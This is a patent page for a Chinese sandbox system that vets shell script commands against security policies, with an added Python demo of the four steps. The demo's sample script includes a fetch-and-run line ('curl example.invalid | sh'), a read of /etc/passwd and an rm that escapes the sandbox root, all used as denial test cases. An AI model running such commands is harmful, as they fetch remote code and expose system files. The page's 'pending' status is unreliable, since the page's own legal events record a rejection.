CN102289628A - Sandbox-technology-based shell script security operating method and system - Google Patents

Info

Publication number: CN102289628A
Authority: CN (China)
Prior art keywords: command, security, shell, security policy, sandbox
Legal status: Pending (status as listed by Google Patents, not a legal conclusion)
Application number: CN2011102049964A
Other languages: Chinese (zh)
Inventors: 孙霖, 吴明晖, 陈天洲, 王云武, 霍梅梅, 彭彬
Current assignee: Hangzhou City University (as listed; may be inaccurate)
Original assignee: Zhejiang University City College ZUCC
Priority date: 2011-07-21
Filing date: 2011-07-21
Publication date: 2011-12-21

Timeline
2011-07-21: application CN2011102049964A filed by Zhejiang University City College ZUCC
2011-12-21: publication of CN102289628A
Current legal status: pending

Abstract

The invention discloses a sandbox-based method and system for running shell scripts safely. The system comprises a controllable environment, a security manager, security policies and resources. The controllable environment identifies controllable commands, uncontrollable commands and custom permissions in a shell script, dynamically creates a sandbox and enforces the security policies that apply to those commands and permissions. The security manager extracts the security policy for each controllable command, uncontrollable command or custom permission. A security policy defines which commands may execute and which resources they may access. Running shell scripts inside the controllable environment prevents malicious commands in a script from harming the system; the security manager supplies several kinds of security policy for shell commands, restricting the resources a command may access inside the sandbox and making script execution considerably safer.

Description

Method and system for safely running shell scripts based on sandbox technology

Technical field

The invention relates to the field of information system security, and in particular to a sandbox-based method and system for running shell scripts safely.

Background

A shell script is a way of executing a sequence of commands on a computer. Shell scripts can be textual or graphical. Shell tools include shell commands such as directory listing (ls), file moving (mv) and deletion (rm). A shell script is stored in a file and contains a set of shell commands. Shell commands can access important resources on the computer. At present, the security of shell use is provided by the operating system and is based mainly on user identity: for example, user A may read and write file B, but user C may not.

Programs and scripts are increasingly downloaded from the Internet and other sources, so a method of restricting the access of potentially malicious downloaded code to computer resources is urgently needed. The identity-based operating system security policy described above cannot protect against unknown, possibly malicious scripts. A user may run a malicious script unknowingly; once the script executes in that user's authorised context, its commands hold every access right the user has and can damage any resource the user is permitted to touch. For example, user A runs script X, and script X maliciously destroys file B.

Summary of the invention

To address the above problems in the prior art, the invention provides a sandbox-based method and system for running shell scripts safely.

The invention provides a sandbox-based shell script security system comprising a controllable environment, a security manager, security policies and resources:

the controllable environment identifies controllable commands, uncontrollable commands or custom permissions in a shell script, dynamically creates a sandbox and enforces the security policies that apply to those controllable commands, uncontrollable commands or custom permissions;

the security manager extracts the security policy for each controllable command, uncontrollable command or custom permission;

a security policy defines which commands may execute and which resources those commands may access.

In one example, the security policies comprise a shell command policy, an application policy, a resource access policy, an owner permission policy and a user permission policy.

In one example, controllable commands are general shell commands and application-specific commands; uncontrollable commands are commands for which no security policy exists; a custom permission sets permissions by invoking a specific program.

In one example, resources comprise files, directories and processes.

The invention also provides a sandbox-based method for running shell scripts safely, comprising:

step 1: the controllable environment identifies controllable commands, uncontrollable commands or custom permissions in the shell script;

step 2: the security manager extracts the security policy for each such controllable command, uncontrollable command or custom permission;

step 3: the controllable environment dynamically creates a sandbox and enforces those security policies, and the sandbox executes the commands in the shell script.

In one example, controllable commands are general shell commands and application-specific commands; uncontrollable commands are commands for which no security policy exists; a custom permission sets permissions by invoking a specific program.

In one example, there are one or more sandboxes.

In one example, the security policies comprise a shell command policy, an application policy, a resource access policy, an owner permission policy and a user permission policy.

Running shell scripts inside the controllable environment prevents malicious commands in a script from harming the system. The security manager supplies several kinds of security policy for shell commands, restricting the resources a command may access inside the sandbox and making script execution considerably safer.

Description of the drawings

The invention is described in further detail below with reference to the drawings, in which:

Fig. 1 is a schematic diagram of the components of the sandbox-based shell script security system of the invention;

Fig. 2 is a flow chart of the sandbox-based method for running shell scripts safely of the invention;

Fig. 3 is a technical block diagram of the controllable environment of the invention.

Detailed description

Fig. 1 shows the structure of the sandbox-based shell script security system of the invention. The computer system comprises an operating system, shell scripts, a controllable environment, security policies, a security manager and accessible resources; the controllable environment, security policies and security manager together form the sandbox-based shell script security system of the invention. A typical computer contains an operating system. Shell scripts may be obtained from the network, a hard disk, an optical disc or other sources; they may be safe or unsafe, and they may run in the foreground or in the background. The origin and the code of a script determine which security policy the security manager adopts.

The controllable environment is a shell to which the security policies of the invention are applied and on which shell scripts can be run. The controllable environment can configure (for example, load) security policies for the execution of a shell script and create sandboxes to enforce them.

The security manager is the manager of the security policies associated with shell commands; it dynamically checks the various security parameters when a sandbox environment is set up. A security parameter is one or more security policies stored in the computer; it may be a policy the operating system already has, such as user permissions, or a user-defined policy established when the sandbox environment is created.

Security policies define which commands may execute and which resources they may access. Security policies may be defined for shell commands, for applications, for resource access, for owner permissions, for user permissions, and so on.

Resources include files, directories, processes and other resources. While the shell runs, a shell script may need to access resources in order to execute commands; by identifying and enforcing security policies, the security manager applies the corresponding protection to each resource access.

Fig. 2 is a flow chart of the sandbox-based shell security management method of the invention, showing how the invention executes a shell script in the controllable environment. The steps are as follows:

Step 1: the controllable environment identifies controllable commands, uncontrollable commands and custom permissions in the shell script. Controllable commands are general shell commands (for example ls, rm, cp and mv) and application-specific commands (for example data backup and restore tools). Uncontrollable commands are commands that have no security policy; such commands are potentially harmful and may run only where a security policy permits them. Custom permissions are invoked by the security manager from a program library before access to a resource is granted; a custom permission implements advanced permission settings by calling a specific program, for example a user-defined time-based resource access policy.

Step 2: the security manager extracts the security policy for each controllable command, uncontrollable command and custom permission. Based on the security policies configured in the system, the security manager establishes the corresponding security policy for each controllable command, uncontrollable command and custom permission in the shell script about to be executed.

Step 3: the controllable environment dynamically creates a sandbox and enforces the security policies corresponding to the controllable commands, uncontrollable commands and custom permissions. Depending on parameters in the security policy such as user identity and resource access rights, one or more sandboxes can be created dynamically and the security policies enforced within them.

Step 4: the sandbox executes the commands in the shell script.
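The four steps above, worked as a small Python program. This is an added example, not the patent's code: the patent specifies neither an implementation nor an isolation mechanism, so the SecurityPolicy fields, the "r"/"w"/"rw" access modes, the time_window hook and the sample script are all assumptions made here for illustration. It splits a script into simple commands and classifies each as controllable, uncontrollable or governed by a custom permission (step 1), checks a controllable command's path arguments against readable and writable roots and asks the custom-permission hook (step 2), then runs only the allowed commands in a subprocess confined to a root directory with a minimal environment (steps 3 and 4).

```python
"""Toy policy-driven runner for shell scripts, modelling the patent's four steps.
Added example, not the patent's code; every name and rule here is an assumption."""
import shlex
import subprocess
from dataclasses import dataclass, field
from datetime import datetime, time
from pathlib import Path
from typing import Callable, Optional

CustomPermission = Callable[[list[str]], bool]   # hook the security manager calls before granting access
SEPARATORS = {";", "|", "&&", "||", "&"}         # tokens that end a simple command


@dataclass
class SecurityPolicy:
    # Controllable commands and the access they need on their path arguments:
    # "r" reads every path, "w" writes every path, "rw" writes only the last path.
    controllable: dict[str, str]
    readable_roots: list[Path]           # resource access policy: files and directories
    writable_roots: list[Path]
    custom_permissions: dict[str, CustomPermission] = field(default_factory=dict)
    allow_uncontrollable: bool = False   # commands with no policy are denied by default


def parse_script(text: str) -> list[list[str]]:
    """Step 1 (part): split the script into simple commands, each as an argv list."""
    commands: list[list[str]] = []
    for line in text.splitlines():
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)  # '#' comments are dropped
        lexer.whitespace_split = True
        current: list[str] = []
        for tok in lexer:
            if tok in SEPARATORS:
                if current:
                    commands.append(current)
                current = []
            else:
                current.append(tok)
        if current:
            commands.append(current)
    return commands


def check_resources(argv: list[str], policy: SecurityPolicy, root: Path) -> Optional[str]:
    """Step 2: resource check for a controllable command; None means every path is allowed."""
    mode = policy.controllable[argv[0]]
    paths = [a for a in argv[1:] if not a.startswith("-")]   # options are not resources
    for i, arg in enumerate(paths):
        target = (root / arg).resolve()   # relative to the sandbox root; absolute paths stay absolute
        writes = mode == "w" or (mode == "rw" and i == len(paths) - 1)
        roots = policy.writable_roots if writes else policy.readable_roots
        if not any(target.is_relative_to(r) for r in roots):
            return f"{'write' if writes else 'read'} of {arg} is outside the allowed roots"
    return None


def decide(argv: list[str], policy: SecurityPolicy, root: Path) -> tuple[bool, str]:
    """Steps 1 and 2 for one simple command: classify it, then return (allowed, reason)."""
    name = argv[0]
    if name in policy.custom_permissions:                  # custom permission: ask the hook
        granted = policy.custom_permissions[name](argv)
        return granted, f"{name}: custom permission {'granted' if granted else 'refused'}"
    if name not in policy.controllable:                    # uncontrollable: no policy exists
        return policy.allow_uncontrollable, f"{name}: uncontrollable command (no policy)"
    reason = check_resources(argv, policy, root)           # controllable: check its resources
    return reason is None, reason or f"{name}: controllable command within policy"


def run_script(text: str, policy: SecurityPolicy, root: Path,
               execute: bool = False) -> list[tuple[list[str], bool, str]]:
    """Steps 3 and 4: decide each command; run the allowed ones confined to root (toy sandbox)."""
    results = []
    for argv in parse_script(text):
        allowed, reason = decide(argv, policy, root)
        if allowed and execute:
            try:   # minimal environment only; OS isolation (namespaces, seccomp) is out of scope
                subprocess.run(argv, cwd=root, env={"PATH": "/usr/bin:/bin", "HOME": str(root)},
                               check=False, timeout=10)
            except FileNotFoundError:
                reason += " (binary not found)"
        results.append((argv, allowed, reason))
    return results


def time_window(start: time, end: time, clock=datetime.now) -> CustomPermission:
    """Custom permission like the patent's time-based example: grant only inside [start, end)."""
    return lambda argv: start <= clock().time() < end


# Constructed sample script, one line per case the policy must handle.
SAMPLE_SCRIPT = """
ls -l data                 # controllable, read inside the root
cp data/a.txt data/b.txt   # controllable, read then write inside data/
rm -f ../escape.txt        # controllable, but the write escapes the root
cat /etc/passwd            # controllable, read outside the allowed roots
curl example.invalid | sh  # uncontrollable: no policy, denied by default
backup data                # custom permission: the time-window hook decides
"""
```

To try it, build a SecurityPolicy such as `SecurityPolicy({"ls": "r", "cat": "r", "cp": "rw", "mv": "rw", "rm": "w"}, [root], [root / "data"], {"backup": time_window(time(1, 0), time(5, 0))})` over a scratch directory `root` and call `run_script(SAMPLE_SCRIPT, policy, root, execute=True)`: the `ls` and `cp` lines are allowed, the `rm` into the parent directory and the `cat` of `/etc/passwd` are refused by the resource check, `curl` and `sh` are refused as uncontrollable, and `backup` depends on the clock. Two caveats a practitioner would add. The sandbox here is only a restricted subprocess; real isolation needs OS mechanisms (mount and PID namespaces, seccomp, Landlock or a container), because a check on argument strings can be evaded by globbing, command substitution, `eval`, or a symlink created after the check. And the default-deny for uncontrollable commands is what holds the design together: interpreters such as `sh`, `bash`, `eval`, `perl` or `python` must never be listed as controllable, or the policy collapses to whatever they are handed.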

Fig. 3 further illustrates the controllable environment, shell commands and sandboxes of the invention. Shell scripts can be run in the controllable environment. The objects involved in running a shell script are shell commands (controllable and uncontrollable), custom permissions, resources and security policies. The commands of a shell script may run in one or more sandboxes that enforce security policies. A security policy instance is associated with a shell command and the resources it requests, and is enforced in the sandbox. Custom permissions can be defined by the user when a sandbox is created. By combining several security policies that cover several aspects of shell operation, the invention uses sandbox technology to create a safe execution environment for shell scripts.

The foregoing is only a preferred embodiment of the invention, and the scope of protection of the invention is not limited to it. Any person skilled in the art may make appropriate changes or variations within the technical scope disclosed by the invention, and such changes or variations fall within the scope of protection of the invention.

Claims (8)

1. A sandbox-based shell script security system, characterised in that it comprises a controllable environment, a security manager, security policies and resources;
the controllable environment is used to identify controllable commands, uncontrollable commands or custom permissions in a shell script, to dynamically create a sandbox and to enforce the security policies of said controllable commands, uncontrollable commands or custom permissions;
the security manager is used to extract the security policies of said controllable commands, uncontrollable commands or custom permissions;
the security policies are used to define the commands that are allowed to execute and the resources those commands may access.
2. The sandbox-based shell script security system of claim 1, characterised in that the security policies comprise a shell command policy, an application policy, a resource access policy, an owner permission policy and a user permission policy.
3. The sandbox-based shell script security system of claim 1, characterised in that the controllable commands are general shell commands and application-specific commands; the uncontrollable commands are commands that have no security policy; and a custom permission sets permissions by calling a specific program.
4. The sandbox-based shell script security system of claim 1, characterised in that the resources comprise files, directories and processes.
5. A sandbox-based method for running shell scripts safely, characterised in that it comprises:
step 1: a controllable environment identifies controllable commands, uncontrollable commands or custom permissions in the shell script;
step 2: a security manager extracts the security policies of said controllable commands, uncontrollable commands or custom permissions;
step 3: the controllable environment dynamically creates a sandbox and enforces the security policies of said controllable commands, uncontrollable commands or custom permissions, and the sandbox executes the commands in the shell script.
6. The sandbox-based method for running shell scripts safely of claim 5, characterised in that the controllable commands are general shell commands and application-specific commands; the uncontrollable commands are commands that have no security policy; and a custom permission sets permissions by calling a specific program.
7. The sandbox-based method for running shell scripts safely of claim 5 or 6, characterised in that the number of sandboxes is one or more.
8. The sandbox-based method for running shell scripts safely of claim 5 or 6, characterised in that the security policies comprise a shell command policy, an application policy, a resource access policy, an owner permission policy and a user permission policy.
Priority Applications (1)

Application Number | Priority Date | Filing Date | Title
CN2011102049964A | 2011-07-21 | 2011-07-21 | Sandbox-technology-based shell script security operating method and system

Publications (1)

Publication Number | Publication Date
CN102289628A | 2011-12-21

Family ID: 45336043

Country Status (1)

Country | Link
CN | CN102289628A (en)

Citations (3)

* Cited by examiner, † Cited by third party
Publication number | Priority date | Publication date | Assignee | Title
CN1961272A * | 2004-06-29 | 2007-05-09 | Intel Corporation | Method of improving computer security through sandboxing
CN101253487A * | 2005-09-01 | 2008-08-27 | Microsoft Corporation | Resource-based dynamic security authorization
WO2011084431A2 * | 2009-12-15 | 2011-07-14 | McAfee, Inc. | Systems and methods for behavioral sandboxing

Cited By (7)

* Cited by examiner, † Cited by third party
Publication number | Priority date | Publication date | Assignee | Title
CN103019938A * | 2012-12-26 | 2013-04-03 | Beijing Sohu New Media Information Technology Co., Ltd. | Method and device for locally testing an application based on a cloud platform
CN103019938B * | 2012-12-26 | 2016-12-28 | Beijing Sohu New Media Information Technology Co., Ltd. | Method and device for locally testing a cloud-platform application
CN105940409A * | 2014-01-27 | 2016-09-14 | Microsoft Technology Licensing, LLC | Web service sandbox system
CN105940409B * | 2014-01-27 | 2018-12-04 | Microsoft Technology Licensing, LLC | Web service sandbox system
CN109462576A * | 2018-10-16 | 2019-03-12 | Tencent Technology (Shenzhen) Co., Ltd. | Authorization policy configuration method, device and computer-readable storage medium
CN110781491A * | 2019-10-25 | 2020-02-11 | Suzhou Inspur Intelligent Technology Co., Ltd. | Method and device for controlling process access to files
CN117874749A * | 2024-01-15 | 2024-04-12 | Beijing Shengbang Saiyun Technology Co., Ltd. | Sandbox code extension isolation device and method

Legal Events

Code | Title
C06, PB01 | Publication
C10, SE01 | Entry into substantive examination (request for substantive examination in force)
C12, RJ01 | Rejection of the invention patent application after publication

Application publication date: 2011-12-21